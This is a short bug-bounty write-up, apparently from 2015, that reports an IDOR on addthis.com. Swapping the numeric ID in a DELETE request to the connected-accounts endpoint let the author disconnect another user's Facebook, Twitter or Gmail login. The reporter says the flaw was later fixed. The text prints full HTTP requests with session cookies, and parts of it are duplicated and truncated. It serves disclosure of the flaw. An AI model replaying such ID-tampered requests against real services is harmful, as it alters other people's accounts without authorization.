First of all i want to introduce Addthis.com
AddThis is a media web-tracking technology company based in Vienna, Virginia, United States. The company operates AddThis.com, a social bookmarking service that can be integrated into a website with the use of a web widget
During testing addthis.com i got a IDOR( Insecure Direct Object Reference)
So via this IDOR i was able to disconnect any user social login Like Facebook, Twitter, Gmail
So lets start how i find
When a user click on disconnect any connect social login the following request made
DELETE /darkseid/account/connected-
accounts/2806924 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.addthis.com/dashboard
Cookie: uid=55d0eb989e2cee94; uvc=12%7C33%2C9%7C34%2C25%7C35%2C11%7C36%2C11%7C37; di2=NT6YRS.X7Y~X5L~W4O~S9E|KU.UYM; vc=3; loc=MDAwMDBBU0lOV0IyMDI2MjY4NDAwMDAwMDAwVg==; um=g.'27362734525410363693302804098779280801'|2JX!2TR-qys5R3883EzYYw6BIR; bt2=55d0ee88001E70001003y70001; ssc=facebook%3B1%2Cgoogle%3B1; km_ab_cbp=1; km_ai=55fb100042f038.14843744; PHPSESSID=ltvujq6sdr095r121229ah1pd2; siteaud=all%7C1442517586%3Bpub%7C1442519399%3Bregpub%7C1442519399; ana_svc=sk; _conv_v=vi:1442516999392-0.5064123653263851*sc:2*cs:1442519430*fs:1442516999*pv:4*ps:1442516999; __atuvc=3%7C37; __atuvs=55fb1007e0d70ac9002; __utma=56306477.1273717834.1442517001.1442517001.1442517001.1; __utmb=56306477.8.10.1442517001; __utmc=56306477; __utmz=56306477.1442517001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SERVERID=lpw000|VfsZk|VfsTE; aps=%7B%22stats%22%3A%2214days%22%2C%22date-from%22%3A%222015-09-03%22%2C%22date-to%22%3A%222015-09-16%22%2C%22_u%22%3A%22%22%7D; __utmt=1; _conv_s=si:2*pv:1
X-Zm-Ff: 1
Connection: keep-alive
DELETE /darkseid/account/connected-
accounts/2806929 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.addthis.com/dashboard
Cookie: uid=55d0eb989e2cee94; uvc=12%7C33%2C9%7C34%2C25%7C35%2C11%7C36%2C11%7C37; di2=NT6YRS.X7Y~X5L~W4O~S9E|KU.UYM; vc=3; loc=MDAwMDBBU0lOV0IyMDI2MjY4NDAwMDAwMDAwVg==; um=g.'27362734525410363693302804098779280801'|2JX!2TR-qys5R3883EzYYw6BIR; bt2=55d0ee88001E70001003y70001; ssc=facebook%3B1%2Cgoogle%3B1; km_ab_cbp=1; km_ai=55fb100042f038.14843744; PHPSESSID=ltvujq6sdr095r121229ah1pd2; siteaud=all%7C1442517586%3Bpub%7C1442519399%3Bregpub%7C1442519399; ana_svc=sk; _conv_v=vi:1442516999392-0.5064123653263851*sc:2*cs:1442519430*fs:1442516999*pv:4*ps:1442516999; __atuvc=3%7C37; __atuvs=55fb1007e0d70ac9002; __utma=56306477.1273717834.1442517001.1442517001.1442517001.1; __utmb=56306477.8.10.1442517001; __utmc=56306477; __utmz=56306477.1442517001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SERVERID=lpw000|VfsZk|VfsTE; aps=%7B%22stats%22%3A%2214days%22%2C%22date-from%22%3A%222015-09-03%22%2C%22date-to%22%3A%222015-09-16%22%2C%22_u%22%3A%22%22%7D; __utmt=1; _conv_s=si:2*pv:1
X-Zm-Ff: 1
Connection: keep-alive
AddThis is a media web-tracking technology company based in Vienna, Virginia, United States. The company operates AddThis.com, a social bookmarking service that can be integrated into a website with the use of a web widget
During testing addthis.com i got a IDOR( Insecure Direct Object Reference)
So via this IDOR i was able to disconnect any user social login Like Facebook, Twitter, Gmail
So lets start how i find
When a user click on disconnect any connect social login the following request made
DELETE /darkseid/account/connected-
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.addthis.com/
Cookie: uid=55d0eb989e2cee94; uvc=12%7C33%2C9%7C34%2C25%
X-Zm-Ff: 1
Connection: keep-alive
So at this time to check the IDOR i create another test account which is associated with id
2806929
2806929
now from the account associate with the Id 2806924 i requested another social login disconnect the request was very similar to the above request
here just i changed the id 2806924 to 2806929
So here is the final request
DELETE /darkseid/account/connected-
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.addthis.com/
Cookie: uid=55d0eb989e2cee94; uvc=12%7C33%2C9%7C34%2C25%
X-Zm-Ff: 1
Connection: keep-alive
So finally its Gives a 200 OK responds ( sorry i forget Save the Responds)
And i checked the social login disconnected which is associated with the id 2806929
Timeline:
Bug Reported: 18/09/15
Validated: 19/09/15
Fixed: 1/11/2016
Thanks